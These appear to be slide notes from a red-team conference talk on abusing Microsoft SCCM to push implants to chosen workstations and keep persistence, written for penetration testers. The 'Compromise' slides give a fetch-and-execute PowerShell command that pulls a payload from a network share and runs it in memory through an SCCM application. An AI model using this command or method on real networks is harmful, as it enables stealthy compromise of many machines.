Red Team Upgrades: Using SCCM for Malware Deployment

@enigma0x3

❖ Penetration Tester and Red Teamer for the Adaptive Threat Division (ATD) of Veris Group

❖ Active developer on the PowerShell Empire project❖ Offensive PowerShell advocate❖ 2nd time speaking!❖ This con is probably older than I am❖ Indiana corn farmer turned h4x0r (not really)

❖ What is SCCM and how some admins fail at securing it

❖ Ways to abuse Microsoft’s System Center Configuration Manager (SCCM) for targeted network compromise.➢ I’m going to cover targeted, strategic use as opposed to mass

pwnage

What this is...

Setting the Stage

❖ This talk assumes you have RDP access to a SCCM server

❖ This talk is focused on abusing SCCM for lateral movement/persistence in a targeted manner, not obtaining access to SCCM.

❖ No, having access to SCCM does not mean you own the enterprise

❖ If you administer SCCM as a domain admin, you fail.

What is SCCM?

❖ Platform for distributing packages/applications to clients

❖ Packages, applications and install scripts are hosted on the SCCM server

❖ Setup and maintained via an agent/server architecture

❖ Consists of a central site server with distribution points.➢ Agents check in to server periodically to obtain new

packages/applications

❖ Basically acts as internal RAT/C2

SCCM in the enterprise

❖ 1 central site server with multiple distribution points

❖ Typically managed via controlled groups➢ e.g. “SCCM Admins” in AD

❖ Typically setup/configured using a service account to run the application/push updates

❖ Application contents (*cough, cough install scripts and notes*) are hosted on a publicly available share

❖ Admins gonna admin

Right Click Tools

❖ Add-On that can be installed to assist in client management tasks

❖ Should be installed on a client such as an administrative workstation...not on the server➢ Admins install it on the server anyways

❖ Enables full control of managed endpoints

Yep...

Why use SCCM in Red Teaming?

❖ Manages a ton of distributed clients➢ Take control of the server and you have distributed workstation

control

➢ SCCM agents are just waiting to run your code

❖ Live off of the land➢ Keep your malicious implant count low, use SCCM for very

targeted implant distribution

➢ Looks like normal day-to-day traffic/activity

➢ To limit the risk of getting caught, become an admin and not a typical adversary

Why use SCCM in Red Teaming? (cont)

❖ Allows you to identify and strategically group targets➢ Able to push implants out in a very controlled and surgical

manner

❖ Also acts as a persistence mechanism

Abusing SCCM: Hunting

❖ Some organizations have user->device mapping➢ This allows for admins to create specific groups for departments

❖ We can abuse this to hunt for specific users without generating any additional network/domain traffic

Abusing SCCM: Compromise

❖ Create an application/package that utilizes PowerShell for payload delivery and execution

❖ Do so by creating a PowerShell payload and throw it up on the public share SCCM uses (typically something like sccmsource)

Abusing SCCM: Compromise

❖ Create a script installer application to fetch and execute your payload➢ cmd.exe /c “powershell.exe -c “gc \\serverName\

sharedFolder\ApplicationFolder\payload.txt | iex””

❖ Deploy the application to your target group and wait for the SCCM agents to check in➢ Payload is fetched over UNC and runs in memory

❖ More here:➢ https://enigma0x3.wordpress.com/2015/10/27/targeted-worksta

tion-compromise-with-sccm/

Questions and Contact

❖ Feel free to hit me up!❖ enigma0x3 [at] gmail [dot] com❖ @enigma0x3 on Twitter and Github❖ enigma0x3 on Freenode: #psempire❖ Blog: enigma0x3.wordpress.com

References

❖ https://www.trustedsec.com/files/Owning_One_Rule_All_v2.pdf

❖ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation-compromise-with-sccm/